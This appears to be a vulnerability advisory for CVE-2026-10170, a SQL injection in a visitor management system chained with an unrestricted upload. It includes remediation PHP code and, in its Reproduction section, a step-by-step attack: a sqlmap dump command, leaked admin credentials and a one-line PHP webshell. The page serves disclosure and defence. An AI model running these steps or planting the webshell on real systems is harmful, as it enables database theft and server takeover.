VYPR
Medium severity · 6.3 · NVD Advisory · Published May 31, 2026

CVE-2026-10170


Description

SQL injection in code-projects Visitor Management System 1.0 allows remote attackers to extract plaintext admin credentials, enabling full server compromise via file upload.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability

A SQL injection vulnerability exists in code-projects Visitor Management System 1.0. The phone POST parameter, sent from the Phone Number page (/vms/php/phone_0.php) and processed by /vms/php/pass.php, is concatenated into a database query without sanitization or parameterization, as shown in the published exploit [1]. This allows an attacker to inject arbitrary SQL commands. The vulnerability is classified as CWE-89.

Exploitation

An attacker must first authenticate as a low-privilege guard user to reach the vulnerable page. After logging in, the attacker opens the Phone Number page (/vms/php/phone_0.php) and submits a crafted phone parameter containing SQL injection payloads. Using a tool such as sqlmap, the attacker can dump the entire database, including plaintext admin credentials. A public exploit is available [1].

Impact

Successful exploitation yields plaintext admin credentials (e.g., sanjay1:7861). With these credentials, the attacker can log in as an administrator and upload a PHP webshell via the unrestricted file upload functionality in /vms/php/admin_user_0.php (CWE-434). The webshell is stored in a web-accessible directory and can be executed to achieve remote code execution on the server, leading to full compromise of confidentiality, integrity, and availability.

Mitigation

As of the publication date, no official patch has been released by code-projects.org. The vendor has not acknowledged the vulnerability. Users should consider disabling the vulnerable page or implementing input validation and parameterized queries for the phone parameter. Additionally, restrict file upload capabilities and enforce strong authentication. Until a fix is available, the system remains at risk [1].

AI Insight generated on May 31, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input sanitization in the phone POST parameter allows SQL injection, and absent file-type validation enables arbitrary PHP file upload."

Attack vector

An attacker first authenticates as a low-privilege guard user, then submits a crafted `phone` POST parameter to `/vms/php/pass.php` containing SQL injection payloads [1]. The injection is confirmed by submitting a single quote (`'`), which triggers a raw MariaDB error that exposes the unsanitized query [1]. Using sqlmap, the attacker dumps the `login_user` table and extracts plaintext admin credentials (username `sanjay1`, password `7861`) [1]. With admin access, the attacker uploads a PHP webshell through the unrestricted file upload in `/vms/php/admin_user_0.php`, then executes arbitrary OS commands by requesting the webshell at `/vms/php/folder/<shell>.php?cmd=<command>` [1].

Affected code

The SQL injection occurs in `/vms/php/pass.php` at line 9, where the `phone` POST parameter is concatenated directly into a SQL query without parameterization [1]. The unrestricted file upload vulnerability is in `/vms/php/admin_user_0.php`, which performs no file type, extension, or MIME validation [1]. The uploaded webshell is stored in the web-accessible directory `/vms/php/folder/` [1].

What the fix does

No official patch has been published by the vendor. The researcher recommends three remediations [1]: (1) replace the vulnerable SQL query in `pass.php` with a prepared statement using `$stmt = $conn->prepare("SELECT * FROM login_user WHERE phone = ?");` and `$stmt->bind_param("s", $phone);` to prevent SQL injection; (2) for the file upload in `admin_user_0.php`, whitelist allowed extensions (jpg, png, gif), validate the MIME type server-side, store uploads outside the webroot, and rename files to random strings; (3) use `password_hash()` and `password_verify()` instead of storing plaintext passwords.
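The three remediations above, worked through as an added example. This is not code from the Visitor Management System or from the researcher; it assumes a mysqli connection `$conn` with mysqlnd (for `get_result()`), a `login_user` table (named in the advisory) with assumed columns `phone`, `username` and `password`, and a `$dest_dir` for uploads that the web server does not serve. The vulnerable lookup is included only to show the pattern the prepared statement replaces.

```php
<?php
// Added example, not the project's own code. Assumptions: mysqli $conn with
// mysqlnd, table login_user(phone, username, password), $dest_dir outside webroot.

// (1) Vulnerable pattern as the advisory describes it: the phone value is pasted
// into the query text, so a bare ' breaks the statement (raw MariaDB error) and
// ' OR '1'='1 rewrites the WHERE clause. Kept only for comparison.
function lookup_by_phone_vulnerable(mysqli $conn, string $phone): ?array
{
    $sql = "SELECT * FROM login_user WHERE phone = '" . $phone . "'";
    $res = $conn->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// (1) Fixed: the value is bound as a parameter and never parsed as SQL.
function lookup_by_phone(mysqli $conn, string $phone): ?array
{
    $stmt = $conn->prepare("SELECT * FROM login_user WHERE phone = ?");
    $stmt->bind_param("s", $phone);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// (3) Passwords: store a hash so that a dumped login_user table no longer
// yields reusable credentials like sanjay1:7861.
function store_password(mysqli $conn, string $username, string $plain): void
{
    $hash = password_hash($plain, PASSWORD_DEFAULT);
    $stmt = $conn->prepare("UPDATE login_user SET password = ? WHERE username = ?");
    $stmt->bind_param("ss", $hash, $username);
    $stmt->execute();
    $stmt->close();
}

function check_login(mysqli $conn, string $username, string $plain): bool
{
    $stmt = $conn->prepare("SELECT password FROM login_user WHERE username = ?");
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return is_array($row) && password_verify($plain, $row['password']);
}

// (2) Upload hardening for the profile image: extension whitelist, MIME type
// sniffed from the file bytes (not the client-supplied $file['type']), random
// file name, and storage outside the document root so nothing uploaded can be
// requested as /vms/php/folder/<shell>.php. $file is one entry of $_FILES.
function save_profile_image(array $file, string $dest_dir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png',  'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;                       // rejects shell.php, shell.phtml, ...
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowed[$ext]) {
        return null;                       // rejects PHP source named image.jpg
    }
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;   // unguessable, no user input
    $target = rtrim($dest_dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    return $name;   // persist this; serve it through a script that sets Content-Type
}
```

Two caveats a reviewer would add: the whitelist in (2) still matters even with the MIME check, because a web server configured to run `.phtml` or double extensions would otherwise execute a file whose bytes happen to start with a valid image header; and after deploying (3), existing plaintext rows must be rehashed at next login or reset, since `password_verify()` will reject them.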

Preconditions

  • auth: Attacker must have valid low-privilege guard credentials to access the phone page
  • network: Attacker must be able to send HTTP POST requests to the target server
  • input: The phone parameter is submitted via POST to /vms/php/pass.php

Reproduction

Step 1 — Log in as a guard user and navigate to `http://<TARGET>/vms/php/phone_0.php`.
Step 2 — Submit a single quote `'` as the phone number value to confirm SQL injection via the raw MariaDB error.
Step 3 — Capture the POST request in Burp Suite, save it to `sqli.txt`, and run `sqlmap -r sqli.txt --dump --batch` to extract the `login_user` table containing plaintext credentials.
Step 4 — Log in as admin with the extracted credentials (e.g., `sanjay1:7861`).
Step 5 — Navigate to `http://<TARGET>/vms/php/admin_user_0.php`, fill in the form, and upload a PHP webshell (`<?php echo shell_exec($_GET['cmd']); ?>`) as the profile image.
Step 6 — Request the webshell at `http://<TARGET>/vms/php/folder/<filename>.php?cmd=whoami` to execute arbitrary system commands [1].

Generated on May 31, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

1